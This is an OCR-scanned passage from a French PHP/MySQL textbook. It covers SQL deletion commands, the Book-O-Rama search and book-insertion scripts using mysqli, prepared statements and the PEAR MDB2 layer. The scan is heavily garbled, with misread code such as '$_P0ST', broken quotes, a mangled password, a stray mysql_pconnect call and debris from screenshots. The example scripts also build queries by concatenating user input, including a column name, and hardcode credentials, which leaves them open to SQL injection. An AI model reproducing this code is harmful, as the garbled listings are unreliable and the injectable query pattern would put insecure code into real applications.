Pour supprimer une colonne, servez-vous de la requete suivante : 

alter table commandes 
drop taxe; 

Supprimer des enregistrements de la base de donnees 

La suppression des lignes est tres simple. Vous pouvez vous servir de 1' instruction 
DELETE, dont la syntaxe est la suivante : 

DELETE [LOW_PRIORITY] [QUICK] [IGNORE] FROM nom_table 
[WHERE condition] 
[ORDER BY cols_tri] 
[LIMIT nombre] 

Si vous ecrivez uniquement : 

delete from nom_table; 

toutes les lignes de la table seront supprimees ! En general, on prefere ne supprimer que 
certaines lignes, indiquees dans la clause WHERE. Par exemple, il faut supprimer une 
ligne si un livre n'est plus disponible ou si un client n' a passe aucune commande depuis 
un certain temps : 

delete from clients 
where idclient = 5; 

La clause LIMIT permet de limiter le nombre maximal de lignes a supprimer. 

Supprimer des tables 

II peut egalement arriver que vous souhaitiez supprimer une table de votre base de donnees. 
Vous pouvez le faire a l'aide de l'instruction DROP TABLE. Sa syntaxe est tres simple : 

DROP TABLE nom_table; 
Elle supprime toutes les lignes de la table et la table elle-meme. II convient done de 
faire attention lorsque vous l'utilisez. ORDER BY est generalement utilisee en conjonction 
avec LIMIT. 

Supprimer une base de donnees entiere 

Vous pouvez meme supprimer l'integralite d'une base de donnees avec l'instruction 
DROP DATABASE, dont la syntaxe est la suivante : 

DROP DATABASE base_de_donnees; 
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Elle supprime toutes les lignes, toutes les tables, tous les index et la base de donnees 
elle-meme. II va done sans dire qu'elle doit etre utilisee avec precaution ! 

Pour aller plus loin 

Dans ce chapitre, nous avons presente les operations les plus courantes de SQL, celles 
que vous utiliserez pour interagir avec une base de donnees MySQL. Au cours des deux 
prochains chapitres, nous verrons comment connecter MySQL et PHP pour que vous 
puissiez acceder a votre base de donnees a partir du Web. Nous explorerons egalement 
quelques techniques avancees de MySQL. 

Si vous souhaitez vous documenter plus precisement sur SQL, vous pouvez vous reporter 
au standard SQL ANSI, disponible sur le site http://www.ansi.org/. 

Pour plus de details sur les extensions de MySQL par rapport a SQL ANSI, consultez le 
site web de MySQL, http://www.mysql.com. 

Pour la suite 

Au Chapitre 11, nous verrons comment rendre la base de donnees Book-O-Rama 
disponible sur le Web. 
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Acces a une base de donnees 
MySQL a partir du Web avec PHP 



Auparavant, lorsque nous travaillions avec PHP, nous nous servions d'un fichier plat 
pour enregistrer et recuperer nos donnees. Lorsque nous avons mentionne cette appro- 
che (voir Chapitre 2), nous avons egalement dit que les systemes de bases de donnees 
relationnelles rendent ces deux taches (enregistrement et recuperation des donnees) a la 
fois plus simples, plus sures et plus efficaces dans le cadre d'une application web. 
Maintenant que nous sommes capables de nous servir de MySQL pour creer des bases 
de donnees, nous pouvons commencer a connecter cette base de donnees a une inter- 
face web. 

Dans ce chapitre, nous verrons comment acceder a la base de donnees de Book-O- 
Rama a partir du Web, en utilisant PHP. Nous expliquerons comment lire et ecrire dans 
cette base de donnees et comment filtrer les donnees d'entree susceptibles de poser 
probleme. 

Fonctionnement des architectures de bases de donnees web 

Au Chapitre 8, nous avons presente le fonctionnement des architectures de bases de 
donnees web. A titre de rappel, voici les principales etapes de ce processus : 

1. Le navigateur web d'un utilisateur envoie une requete HTTP demandant une page 
particuliere. Par exemple, l'utilisateur peut avoir demande de chercher tous les 
livres ecrits par Michael Morgan a l'aide d'un formulaire HTML. La page de 
recherche des resultats s'appelle resultats.php. 

2. Le serveur web recoit la requete concernant resultats.php, recupere le fichier corres- 
pondant et le passe au moteur PHP afin qu'il y soit traite. 
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3. Le moteur PHP commence a analyser le script. A l'interieur de celui-ci se trouve 
une commande permettant de se connecter a la base de donnees et d'executer une 
requete (c'est-a-dire de rechercher les livres). PHP ouvre ensuite une connexion 
vers le serveur MySQL et envoie la requete appropriee. 

4. Le serveur MySQL recoit la requete de base de donnees, la traite et renvoie les 
resultats obtenus (une liste de livres) au moteur PHP 

5. Le moteur PHP finit 1' execution du script, consistant generalement a formater en 
HTML les resultats de la requete. Le fichier HTML obtenu est alors renvoye au 
serveur web. 

6. Le serveur web renvoie a son tour le fichier HTML au navigateur, qui l'affiche pour 
que l'utilisateur puisse voir la liste des livres qu'il a demandee. 

Maintenant que nous possedons une base de donnees MySQL, nous pouvons ecrire le code 
PHP permettant d'executer les etapes precedentes. Nous commencerons par le formu- 
laire de recherche. II s'agit d'un formulaire en HTML classique, comme celui du 
Listing 11.1. 

Listing 11.1 : recherche.html — La page de recherche dans la base de donnees 
de Book-O-Rama 



<html> 
<head> 

<title>Recherche dans le catalogue de Book-0-Rama</title> 
</head> 

<body> 

<h1 >Recherche dans le catalogue de Book-0-Rama</h1> 

<form action="resultats.php" method="post"> 

Choisissez un type de recherche  :<br /> 

<select name="type_recherche"> 

<option value="auteur">Par auteur</option> 
<option value="titre">Par titre</option> 
<option value="isbn">Par ISBN</option> 

</select> 

<br /> 

Entrez le terme recherche  :<br /> 

<input name="terme_recherche" type="text" size="40" /> 

<br /> 

<input type="submit" value="Rechercher" /> 
</f orm> 



</body> 
</html> 
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Ce formulaire HTML est tres simple. Sa sortie est presentee a la Figure 11.1. 



Figure 11.1 

Le formulaire de recherche 
est tres general puisqu'il 
permet de chercher un 
livre a partir de son titre, 
de son auteur ou de son 
code ISBN. 



3 Recherche dans le catalogue de Book-O-Rama 

CTZJ- GD ® GZ3lT> - (IF?) CM) ® 



Recherche dans le catalogue de 
Book-O-Rama 



Choisisscz un type dc recherche : 

Par auteur * I 

Entrez le tcrmc rcchcrch.6 : 



f Rechercher 1 



Le script appele lorsque l'utilisateur clique sur le bouton Rechercher s'appelle resul- 
tats.php ; son code est celui du Listing 11.2. Tout au long de ce chapitre, nous allons 
expliquer le but et le fonctionnement de ce script. 

Listing 11.2: resultats.php — Le script qui recupere les resultats de notre base de donnees 
MySQL et qui les formate pour les afficher correctement 



<html> 
<head> 

<title>Resultats de la recherche dans Book-0-Rama</title> 
</head> 
<body> 

<h1 >Resultats de la recherche dans Book-0-Rama</h1 > 
<?php 

// Creation de variables aux noms abreges 
$type_recherche = $_P0ST[ ' type_recherche ' ] ; 
$terme_recherche = trim($_P0ST[ ' terme_recherche ' ] ) ; 

if ( ! $type_recherche || !$terme_recherche) { 

echo "Vous n'avez pas saisi les details de la recherche"; 
exit ; 

} 

if ( !get_magic_quotes_gpc( ) ) { 
$type_recherche = addslashes($type_recherche) ; 
$terme_recherche = addslashes($terme_recherche) ; 

} 

@$db = new mysqli( ' localhost ' , ' bookorama' , 'bookoraina123' , 'livres'); 

if (mysqli_connect_errno( ) ) { 

echo "Impossible de se connecter a la base de donnees."; 
exit; 

} 
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$requete = "select * from livres where " . $type_recherche . 

" like '%" . $terme_recherche . "%'"; 
$resultat = $db->query ($requete) ; 

$nb_lig_resultat = $resultat->num_rows; 

echo "<p>Nombre de livres trouves  : " . $nb_lig_resultat . "</p>"; 

for ($i = 0; $i < $nb_lig_resultat ; $i++) { 
$ligne = $resultat->fetch_assoc( ) ; 
echo "<p><strong>" . ($i+1) . ". Titre : "; 
echo htmlspecialchars(stripslashes($ligne[ ' tit re ' ] ) ) ; 
echo "</strong><br />Auteur  : "; 
echo stripslashes($ligne[ 'auteur' ] ) ; 
echo "<br />ISBN  : " ; 
echo stripslashes($ligne[ ' isbn ' ] ) ; 
echo "<br />Prix  : "; 
echo stripslashes($ligne[ 'prix' ] ) ; 
echo ' </p> 1 ; 

} 

$resultat->f ree( ) ; 
$db->close( ) ; 

?> 

</body></html> 



Vous remarquerez que ce script vous permet d'entrer les caracteres joker de MySQL % 
et (blanc souligne), ce qui peut etre utile pour 1' utilisateur. Si cela pose probleme, 
vous pouvez proteger ces caracteres. 

La Figure 11.2 illustre les resultats de ce script. 



Figure 11.2 

Les resultats de la recherche 
des livres sur Java dans 
la base de donnees sont 
presentes dans une page web 
grace au script resultats. php. 



3 Resultats de la recherche dans Book-O-Rama 



CD 



Resultats de la recherche dans 
Book-O-Rama 



Nombre de livres trouves : 1 

1, Titre : Java 2 for Professional Developers 

Auteur : Michael Morgan 
ISBN : 0-672-31697-8 
Prix : 34.99 

Termine 
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Principales etapes dans I'interrogation d'une base de donnees a partir 
du Web 

Dans tous les scripts utilises pour acceder a une base de donnees a partir du Web, il faut 
respecter les etapes suivantes : 

1. Verifier et filtrer les donnees fournies par l'utilisateur. 

2. Etablir une connexion vers la base de donnees appropriee. 

3. Interroger la base de donnees. 

4. Recuperer les resultats. 

5. Presenter les resultats a l'utilisateur. 

Ce sont ces etapes que nous avons suivies dans le script resultats.php et nous allons 
maintenant les etudier une par une. 

Verifier et filtrer les donnees saisies par l'utilisateur 

Nous commencons le script en supprimant tous les espaces que l'utilisateur peut avoir 
saisis par inadvertance au debut ou a la fin de ses donnees. Pour cela, nous appliquons la 
fonction trim( ) a$ POST['terme recherche'] avant de lui associer un nom plus court : 

$terme_recherche = trim($_P0ST[ ' terme_recherche ' ] ) ; 

L'etape suivante consiste a verifier que l'utilisateur a bien entre une expression a 
rechercher et qu'il a selectionne un type de recherche. Vous remarquerez que nous 
effectuons cette verification apres avoir supprime les espaces aux deux extremites du 
terme recherche : si nous inversions ces deux operations, nous ne pourrions pas detecter 
le cas ou l'utilisateur a saisi uniquement des espaces et nous ne pourrions done pas afficher 
un message d'erreur puisque ces espaces n'auraient pas ete supprimes par trim( ) : 

if ( ! $type_recherche || !$terme_recherche) { 

echo "Vous n'avez pas saisi les details de la recherche." 
exit; 

} 

Vous remarquerez que nous verifions aussi la variable $type recherche, bien qu'elle 
provienne dans notre cas d'une instruction SELECT de HTML. Vous vous demandez 
peut-etre pourquoi nous prenons la peine de verifier des variables qui doivent etre 
remplies automatiquement. II est tres important de se rappeler qu'il peut exister 
plusieurs interfaces a votre base de donnees. Amazon, par exemple, possede plusieurs 
filiales qui se servent de leur interface de recherche. En outre, il est important de filtrer 
les donnees pour eviter tout probleme de securite provenant des differentes interfaces 
mises a la disposition des utilisateurs pour saisir leurs donnees. 
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Si vous comptez utiliser des donnees saisies par les utilisateurs, il faut les filtrer pour en 
supprimer tous les caracteres de controle. Pour cela, utilisez les fonctions addslashes( ), 
stripslashes ( ) et get magic quotes gpc( ) que nous avons vues au Chapitre 4. Vous 
devez proteger les donnees lorsque vous soumettez une entree utilisateur dans une base de 
donnees comme MySQL. 

Ici, il faut tester le resultat de la fonction get magic quotes gpc( ), qui vous indique si 
la mise entre apostrophes est automatique. Si ce n'est pas le cas, protegez les donnees 
avec addslashes ( ) : 

if ( !get_magic_quotes_gpc( ) ) { 
$type_recherche = addslashes($type_recherche) ; 
$terme_recherche = addslashes($terme_recherche) ; 

} 

Vous devez egalement utiliser stripslashes ( ) sur les donnees qui proviennent de la base 
de donnees. Si la fonctionnalite des apostrophes automatiques est activee, les donnees 
provenant de la base contiennent en effet des barres obliques que vous devez retirer. 

Nous utilisons egalement la fonction htmlspecialchars( ) pour encoder les caracteres 
qui ont une signification particuliere en HTML. Nos donnees de test actuelles ne contien- 
nent aucun de ces caracteres (&, <, >, ou "), mais il existe plusieurs titres de livres qui 
contiennent le symbole &. Grace a cette fonction, nous pouvons eliminer de futures 
erreurs. 

Etablissement de la connexion 

La bibliotheque PHP pour se connecter a MySQL s'appelle mysqli (le i signifie improved, 
c'est-a-dire ameliore). Vous avez le choix entre une syntaxe orientee objet ou une 
syntaxe procedurale. 

Dans le script, c'est la ligne suivante qui nous permet de nous connecter au serveur 
MySQL : 

@$db = new mysqli( ' localhost ' , ' bookorama 1 , 1 bookoramal 23 ' , 'livres'); 

Celle-ci cree une instance de la classe mysqli et une connexion a l'hote ' localhost ' 
avec le nom d'utilisateur 'bookorama' et le mot de passe ' bookoramal 23 ' . Cette 
connexion est configuree de maniere a utiliser la base de donnees appelee livres. 

Avec cette approche orientee objet, vous pouvez maintenant invoquer des methodes sur 
cet objet afm d'acceder a la base de donnees. Si vous preferez 1' approche procedurale, 
utilisez la ligne suivante pour creer la meme connexion : 

@$db = mysqli_connect( ' localhost 1 , 'bookorama', 1 bookorama123 ' , 

' livres ' ) ; 
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Au lieu d'un objet, cet appel renvoie alors une ressource qui represente la connexion a 
la base de donnees. Si vous utilisez l'approche procedurale, vous devrez passer cette 
ressource a tous les autres appels des fonctions mysqli. Ce mecanisme est tres semblable a 
celui des fonctions sur les fichiers comme f open ( ) . 

La plupart des fonctions mysqli ont une interface orientee objet et une interface procedu- 
rale. En general, les differences tiennent a ce que les noms de fonction de la version proce- 
durale commencent par mysqli et exigent que vous passiez le descripteur que vous avez 
obtenu de mysqli connect ( ) . Les connexions de la base de donnees font exception a cette 
regie car elles peuvent etre effectuees par le constructeur de l'objet mysqli. 

II est preferable de verifier le resultat de votre tentative de connexion, car rien dans le 
reste du code ne fonctionnera si la connexion a la base de donnees n'a pas fonctionne. 
Pour cela, vous pouvez utiliser le code suivant : 

if (mysqli_connect_errno( ) ) { 
echo "Impossible de se connecter a la base de donnees."; 
exit; 

} 

Ce code est identique pour la version orientee objet et la version procedurale. La fonc- 
tion mysqli connect errno() renvoie un numero d'erreur en cas d'erreur et zero en 
cas de succes. 

Lorsque vous vous connectez a la base de donnees, commencez la ligne de code avec 
l'operateur de suppression d'erreur, @. Cette approche vous permettra de gerer les 
erreurs avec elegance (cela peut egalement etre realise avec des exceptions, que nous 
n'avons pas utilisees dans cet exemple simple). 

N'oubliez pas que le nombre de connexions MySQL simultanees est limite par le parame- 
tre MySQL max connections. L'interet de ce parametre et du parametre Apache 
MaxClients associe est de permettre au serveur de rejeter les nouvelles demandes de 
connexion lorsqu'un ordinateur commence a etre surcharge ou lors d'un probleme logiciel. 

Vous pouvez modifier la valeur par defaut de ces deux parametres en modifiant les 
fichiers de configuration. Pour modifier MaxClients dans Apache, editez le fichier 
httpd.conf de votre systeme. Pour changer le parametre max connections de MySQL, 
modifiez le fichier my.conf. 

Choisir une base de donnees a utiliser 

Vous vous rappelez que, lorsque nous utilisons MySQL a partir de la ligne de 
commande, nous devons lui indiquer la base de donnees que nous avons l'intention 
d'utiliser, avec une commande comme celle-ci : 

use livres; 
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Cette etape est aussi necessaire lorsque nous nous connectons a partir du Web. 

La base de donnees a utiliser est indiquee en parametre du constructeur mysqli ou de la 
fonction mysqli connect ( ). Si vous souhaitez modifier la base de donnees par defaut, 
vous pouvez le f aire avec la fonction mysqli select db(): 

$db->select_db {nom_base) 

ou comme ceci : 

my sqli_select_db {descripteur , nom_base ) 

Vous pouvez remarquer ici la similarite avec les fonctions que nous avons decrites 
auparavant : la version procedurale commence avec mysqli et requiert le descripteur 
de la connexion en parametre. 

Interroger la base de donnees 

Pour realiser la requete, vous pouvez utiliser mysql query ( ). Cependant, avant d'appeler 
cette fonction, il vaut mieux construire la requete que vous voulez executer : 

$requete = "select * from livres where " . 

$type_recherche . "like '%$terme_recherche%' " ; 

Ici, nous recherchons les donnees saisies par l'utilisateur ($terme recherche) dans le 
champ qu'il a indique ($type recherche). Vous remarquerez que nous avons utilise 
l'operateur like au lieu de l'egalite : il est generalement preferable d'etre assez tolerant 
pour les recherches dans les bases de donnees. 

ASTUCE 

II est important de bien comprendre que les requetes que vous envoyez a MySQL n'ont pas 
besoin de se terminer par un point-virgule, contrairement aux requetes que vous saisissez 
dans le moniteur de MySQL. 



Nous pouvons maintenant executer la requete : 

$resultat = $db->query ($requete) ; 
Si vous souhaitez utiliser l'interface procedurale, utilisez cette syntaxe : 

$resultat = mysqli_query ($db, $requete); 

Ici, vous passez la requete que vous souhaitez executer et, dans l'interface procedurale, 
le descripteur de la base de donnees ($db). 

La version orientee objet renvoie un objet resultat, tandis que la version procedurale 
renvoie un descripteur de resultat (ce systeme est semblable au fonctionnement de la 
connexion). Dans les deux cas, vous stockez ce resultat dans une variable ($resultat) 
pour pouvoir l'utiliser plus tard. Cette fonction renvoie false en cas d'echec. 
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Recuperer les resultats de la requete 

II existe plusieurs fonctions permettant de recuperer les resultats a partir de l'objet ou 
du descripteur de resultat. Cet objet ou ce descripteur sont essentiels pour acceder aux 
lignes renvoyees par la requete. 

Dans cet exemple, vous avez compte le nombre de lignes et utilise egalement la fonction 
mysqli fetch assoc(). 

Lorsque vous utilisez 1' approche orientee objet, le nombre de lignes est stocke dans le 
membre num rows de l'objet resultat. Vous pouvez y acceder de la maniere suivante : 

$nb_lig_resultat = $resultat->num_rows; 

Lorsque vous utilisez l'approche procedurale, la fonction mysqli num rows ( ) donne le 
nombre de lignes retournees par la requete. II faut lui passer l'identificateur de resultat, 
comme ceci : 

$nb_lig_resultat = mysql_num_rows($result) ; 

Cette information est interessante : si nous avons l'intention de traiter ou d'afficher les 
resultats, nous pouvons ainsi savoir combien il y en a et les traiter dans une boucle : 

for ($i = 0; $i < $nb_lig_resultat ; $i++) { 
// Traitement du resultat 

} 

A chaque iteration de cette boucle, nous appelons $resultat >fetch assoc() (ou 
mysqli fetch assoc()). Cette boucle ne sera done pas executee le resultat de la 
requete ne contenait aucune ligne. La fonction fetch assoc() prend chaque ligne du 
resultat et la renvoie sous la forme d'un tableau associatif ou les cles correspondent aux 
noms de colonnes et les valeurs sont les valeurs de ces colonnes : 

$ligne = $resultat->fetch_assoc( ) ; 

Vous pouvez aussi utiliser une approche procedurale : 

$ligne = mysqli_fetch_assoc($resultat) ; 

A partir du tableau associatif $ligne, nous pouvons parcourir chaque champ et l'afficher 
de maniere appropriee, comme ici : 

echo "<br />ISBN  : e; 

echo stripslashes($ligne[ 1 isbn 1 ] ) ; 

Comme nous l'avons deja vu, nous nous servons de stripslashes ( ) pour filtrer les 
valeurs avant de les afficher. 

II existe plusieurs manieres de recuperer les lignes a partir de l'objet ou du descripteur 
de resultat. Au lieu de passer par un tableau associatif, nous pouvons placer chaque 
ligne dans un tableau classique avec my sql fetch row (), comme ici : 

$ligne = $resultat->f etch_row( ) ; 
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ou 

$ligne = mysqli_f etch_row($resultat) ; 

Les valeurs des colonnes seront alors les valeurs $ligne[0], $ligne[1 ], etc. La fonc- 
tion mysqli fetch array ( ) permet d'extraire une ligne comme l'un ou l'autre de ces 
deux types de tableaux. 

Vous pouvez egalement recuperer une ligne sous la forme d'un objet avec la fonction 
mysql fetch object() : 

$ligne = $result->fetch_object( ) ; 

ou 

$ligne = mysqli_fetch_object($resultat) ; 

Vous pouvez ensuite acceder a chacun des champs avec $ligne >titre, $ligne 
>auteur, etc. 

Deconnexion de la base de donnees 

Vous pouvez liberer l'espace occupe par le resultat en appelant : 
$resultat->f ree( ) ; 

ou 

mysqli_f ree_result ($resultat) ; 
Vous pouvez ensuite utiliser : 
$db->close( ) ; 

ou 

mysqli_close($db) ; 

pour fermer la connexion a la base de donnees. L' utilisation de cette commande n'est 
pas strictement necessaire, car la connexion est de toute facon fermee lorsqu'un script 
termine son execution. 

Ajouter des informations dans la base de donnees 

L' insertion de nouveaux elements dans la base de donnees ressemble beaucoup a leur 
recuperation. II faut en effet suivre les memes etapes : etablir une connexion, envoyer 
une requete et verifier les resultats. Ici, vous devrez envoyer une requete INSERT au lieu 
d'une requete SELECT. 

Bien que le code soit relativement similaire, il peut etre utile de consulter un exemple 
de reference. La Figure 1 1.3 montre un petit formulaire HTML qui permet d' ajouter de 
nouveaux livres dans la base de donnees. 
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Book-O-Rama - Ajout d'un nouveau livre 
(•<!■- ) - (g") (~X~) ( |J ' WtpiZ/localhoslf-jaco/c^T ) - C|G|*{" C(Q ') (B) ©- 

Book-O-Rama - Ajout d'un nouveau livre 



ISBN 
Autcur 
Titrc 
Prix 

C Enregistrer") 



Termine ^ 



Le code HTML de cette page est presente dans le Listing 11.3. 

Listing 11.3 : nouveau_livre.html — Le code HTML de la page d'ajout de livres 



<html> 
<head> 

<title>Book-0-Rama - Ajout d'un nouveau livre</title> 
</head> 

<body> 

<h1 >Book-0-Rama - Ajout d'un nouveau livre</h1> 

<form action="insertion_livre.php" method="post"> 
<table border="0"> 
<tr> 

<td>ISBN</td> 
<td><input type="text" name="isbn" maxlength="13" 
size="13"><br /></td> 

</tr> 
<tr> 

<td>Auteur</td> 

<td> <input type="text" name="auteur" maxlength="30" 
size="30"><br /></td> 

</tr> 
<tr> 

<td>Titre</td> 

<td> <input type="text" name="titre" maxlength="60" 
size="30"><br></td> 

</tr> 
<tr> 

<td>Prix</td> 

<td><input type="text" name="prix" maxlength="7" 
size="7"><br /></td> 

</tr> 
<tr> 

<td colspan="2"><input type="submit" value="Enregistrer"></td> 
</tr> 
</table> 
</f orm> 
</body> 
</html> 



tigure n.j 

L'interface permettant 
d'ajouter de nouveaux 
livres dans la base de 
donnees. 
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Les donnees de ce formulaire sont transmises au script insertion_livre.php , qui 
s'occupe des details, effectue quelques validations mineures et tente d'ecrire les infor- 
mations dans la base de donnees. Le code de ce script se trouve dans le Listing 1 1 .4. 

Listing 11.4 : insertion Jivre.php — Le script qui ecrit les nouveaux livres dans la base 
de donnees 



<html> 
<head> 

<title>Book-0-Rama Resultat de l'ajout d'un livre</title> 
</head> 
<body> 

<h1>Book-0-Rama Resultat de l'ajout d'un livre</h1> 
<?php 

// Creation de variables aux noms abreges 
$isbn = $_POST[ ' isbn' ] ; 
$auteur = $_P0ST[ ' auteur ' ] ; 
$titre = $_P0ST[ 'titre' ] ; 
$prix = $_P0ST[ 'prix' ] ; 

if (!$isbn || !$auteur || !$titre || !$prix) { 

echo "Vous n'avez pas indique tous les details requis.<br />"; 
exit; 

} 

if ( !get_magic_quotes_gpc()) 
{ 

$isbn = addslashes($isbn) ; 
$auteur = addslashes ($auteur) ; 
$titre = addslashes($titre) ; 
$prix = doubleval($prix) ; 

} 

@$db = mysql_pconnect ( ' localhost ' , ' bookorama ' , ' bookoramal 23 ' , 

' livres ' ) ; 

if (mysqli_connect_errno( ) ) { 
echo "Impossible de se connecter a la base de donnees."; 
exit ; 

} 

$requete = "insert into livres values 

( ' " .$isbn. ' ' , ' " .$auteur. ' ' , ' " . $titre . ' ' , ' " . $prix . ' ' ) ' ; 
$resultat = $db->query ($requete) ; 

if ($resultat) { 

echo $db->af f ected_rows . " livre insere dans la base de donnees."; 
} else { 

echo "Une erreur s'est produite. Le livre n'a pas ete ajoute."; 

} 

$db->close( ) ; 

?> 

</body></html> 
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Le resultat d'une insertion reussie est presente a la Figure 1 1.4. 

Book-O-Rarna Resultat de I'ajout d'un livre 
(TFT- @@ Cui »t--C(>-:.,Q- (g) ®- 

Book-O-Rama Resultat de I'ajout d'un livre 

1 livre insert; dans la base dc denizes. 

Terming _4 

Figure 11.4 

Le script se termine correctement et indique que le livre a ete ajoute a la base de donnees. 

Si vous examinez le code de insertionjtivre.php, vous constaterez qu'il ressemble beau- 
coup au script que nous avons ecrit pour recuperer des informations de la base de 
donnees. Nous verifions que tous les champs du formulaire sont correctement remplis 
et nous les formatons (si necessaire) avec addslashes( ) pour qu'ils puissent etre ajoutes 
dans la base de donnees : 

if ( !get_magic_quotes_gpc( ) ) { 
$isbn = addslashes($isbn) ; 
$auteur = addslashes($auteur) ; 
$titre = addslashes($titre) ; 
$prix = doubleval($prix) ; 

} 

Comme le prix de chaque livre est enregistre dans la base de donnees sous la forme 
d'un nombre a virgule flottante, il ne doit contenir aucune barre oblique. Nous pouvons 
filtrer ce caractere et tous les autres caracteres genants avec doubleval(), que nous 
avons deja vue au Chapitre 1. Cela permet en outre de supprimer tous les symboles 
monetaires que l'utilisateur aurait pu saisir dans le formulaire. 

Une fois encore, nous nous sommes connectes a la base de donnees en instanciant 
l'objet mysqli et en configurant une requete a envoyer a cette base. Ici, il s'agit d'une 
requete SQL INSERT : 

$requete = "insert into livres values 

( 1 " .$isbn. 1 1 , 1 " .$auteur. 1 1 , 1 " . $titre . 1 ' , 1 " . $prix . 1 1 ) 1 ; 

$resultat = $db->query ($requete) ; 
Cette requete est executee sur la base de donnees en appelant $db >query() (ou 
mysqli query () si vous adoptez l'approche procedurale). 

Une difference importante entre l'utilisation de INSERT et de SELECT reside dans l'utili- 
sation de mysqli affected rows( ). II s'agit d'une fonction dans la version procedurale 
ou d'une variable de classe dans la version orientee objet : 

echo $db->af f ected_rows . " livre ajoute a la base de donnees."; 
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Dans le script precedent, nous nous etions servis de mysqli num rows ( ) pour determi- 
ner le nombre de lignes renvoyees par SELECT. Lorsque vous ecrivez des requetes qui 
modifient la base de donnees, comme INSERT, DELETE ou UPDATE, vous devez vous 
servir de mysql affected rows(). 

Utiliser des instructions preparees 

La bibliotheque mysqli reconnait les instructions preparees, qui permettent d'accelerer 
les executions repetees d'une meme requete avec des donnees differentes. Elles offrent 
en outre une protection contre les attaques par injection SQL. 

L'idee fondamentale d'une instruction preparee est que vous envoy ez un modele de la 
requete que vous souhaitez executer a MySQL, puis que vous transmettez les donnees 
separement. Vous pouvez envoyer plusieurs lots de donnees a la meme instruction 
preparee ; cette capacite est particulierement utile pour les insertions en masse. 

Voici comment utiliser des instructions preparees dans le script insertion livre . php : 

$requete = "insert into livres values(?, ?, ?, ?)"; 
$instr = $db->prepare($requete) ; 

$instr->bind_param( "sssd" , $isbn, $auteur, $titre, $prix); 
$instr->execute( ) ; 

echo $instr->af f ected_rows . ' livre insere dans la base de donnees."; 
$instr->close( ) ; 

Etudions ce code ligne par ligne. 

Au lieu de mettre les variables dans la requete comme precedemment, on place des 
points d'interrogation pour chaque element de donnees. II ne faut mettre aucune apos- 
trophe ni aucun autre delimiteur autour de ces points d'interrogation. 

La seconde ligne est un appel a $db >prepare(), qui s'appelle mysqli stmt prepare () 
dans sa version procedurale. Cette ligne construit un objet ou un descripteur d'instruction 
que vous utiliserez pour realiser le traitement lui-meme. 

L' objet instruction possede une methode appelee bind param( ) (dans la version proce- 
durale, il s'agit de mysqli stmt bind param()). Son role consiste a indiquer a PHP 
quelles variables doivent venir remplacer les points d'interrogation. Le premier para- 
metre est une chaine de format qui fonctionne un peu a la maniere de celle utilisee dans 
printf (). La valeur que vous passez ici ("sssd") signifie que les quatre parametres 
sont, respectivement, une chaine ("s" comme string, en anglais), une chaine, une chaine 
et un double. Les autres caracteres possibles de cette chaine de format sont i pour le 
type entier et b pour BLOB. Apres ce parametre, vous devez enumerer le meme nombre 
de variables qu'il y a de points d'interrogation dans votre instruction. lis seront remplaces 
selon leur ordre d' apparition. 
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L'appel a $instr >execute() (mysqli stmt execute() dans la version procedurale) 
execute la requete. Vous pouvez ensuite acceder au nombre de lignes affectees et fermer 
l'instruction. 

Linteret de cette instruction preparee est que vous pouvez desormais modifier les valeurs 
des quatre variables liees puis reexecuter l'instruction sans avoir a la repreparer. Cette fonc- 
tionnalite permet done de traiter des insertions massives a l'aide d'une simple boucle. 

Vous pouvez egalement lier les resultats. Pour les requetes de type SELECT, vous pouvez 
utiliser $instr >bind result () (ou mysqli stmt bind result ()) pour fournir une 
liste de variables dans lesquelles vous souhaitez placer les colonnes du resultat. A 
chaque appel de $instr >f etch ( ) (ou mysqli stmt fetch ( )), les valeurs des colonnes 
de la ligne suivante du resultat viendront remplir ces variables liees. Par exemple, dans le 
script de recherche de livre que nous avons examine plus haut, vous pourriez utiliser : 

$instr->bind_result($isbn, $auteur, $titre, $prix) ; 

pour lier ces quatre variables aux quatre colonnes renvoyees par la requete. Apres avoir 
appele : 

$instr->execute( ) ; 

vous pouvez appeler : 

$instr->fetch( ) ; 

dans la boucle. A chaque fois que cette fonction est appelee, elle extrait la ligne 
suivante du resultat et l'utilise pour remplir les quatre variables liees. 

Vous pouvez utiliser mysqli stmt bind param() et mysqli stmt bind result () 
dans le meme script. 

Autres interfaces PHP pour les bases de donnees 

PHP dispose de plusieurs bibliotheques lui permettant de se connecter a diverses bases 
de donnees, comme Oracle, Microsoft SQL Server et PostgreSQL. 

En general, les principes pour se connecter a une base de donnees et pour lui envoyer des 
requetes restent les memes. Les noms des fonctions peuvent varier, tout comme les fonc- 
tionnalites offertes par les differentes SGBDR mais, si vous pouvez vous connecter a 
MySQL, vous devriez etre capable de vous adapter a n'importe quel autre environnement. 

Si vous souhaitez utiliser une base de donnees ne possedant aucune bibliotheque speci- 
fique pour PHP, vous pouvez toujours passer par les fonctions ODBC (Open Database 
Connectivity) generiques. ODBC est un standard pour les connexions a des bases de 
donnees mais, pour des raisons evidentes, il ne dispose que de fonctionnalites limitees. 
Lorsqu'un systeme doit posseder une compatibilite maximale, il ne peut pas exploiter 
toutes les caracteristiques de chaque systeme. 
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Outre les bibliotheques fournies avec PHP, il existe des classes d' abstraction pour les 
bases de donnees, comme MDB2, qui permettent d'utiliser les memes noms de fonctions 
pour tous les SGBDR. 

Utilisation d'une interface de base de donnees generique : 
PEAR::MDB2 

Nous allons nous interesser a un petit exemple utilisant la couche d' abstraction MDB2, 
qui est l'un des composants de PEAR le plus utilise. Si cette couche d' abstraction n'est 
pas deja installee sur votre systeme, consultez la partie de l'Annexe A consacree a 
l'installation de PEAR. 

A des fins de comparaison, examinons la maniere dont nous aurions ecrit le script de 
recherche avec MDB2. 

Listing 11.5 : resultats_generique.php — Recupere les resultats d'une recherche 
dans une base de donnees MySQL et les formate pour affichage 



<html> 
<head> 

<title>Book-0-Rama Resultats de la recherche</title> 
</head> 
<body> 

<h1 >Book-0-Rama Resultats de la recherche</h1> 
<?php 

// Creation de variables aux noms abreges 
$type_recherche = $_POST[ ' type_recherche ' ] ; 
$terme_recherche = trim($_P0ST[ ' terme_recherche ' ] ) ; 
// Creation de variables aux noms abreges 
$type_recherche = $_POST[ ' type_recherche ' ] ; 
$terme_recherche = trim($_P0ST[ ' terme_recherche ' ] ) ; 

if ( ! $type_recherche || !$terme_recherche) { 

echo "Vous n'avez pas saisi les details de la recherche"; 
exit ; 

} 

if ( !get_magic_quotes_gpc( ) ) { 
$type_recherche = addslashes($type_recherche) ; 
$terme_recherche = addslashes($terme_recherche) ; 

} 

// Configuration de PEAR MDB2 
require_once( 'MDB2.php' ) ; 
$utilisateur = 'bookorama'; 
$mdp = ' bookoramal 23 1 ; 
$hote = ' localhost ' ; 
$nom_base = 'livres'; 

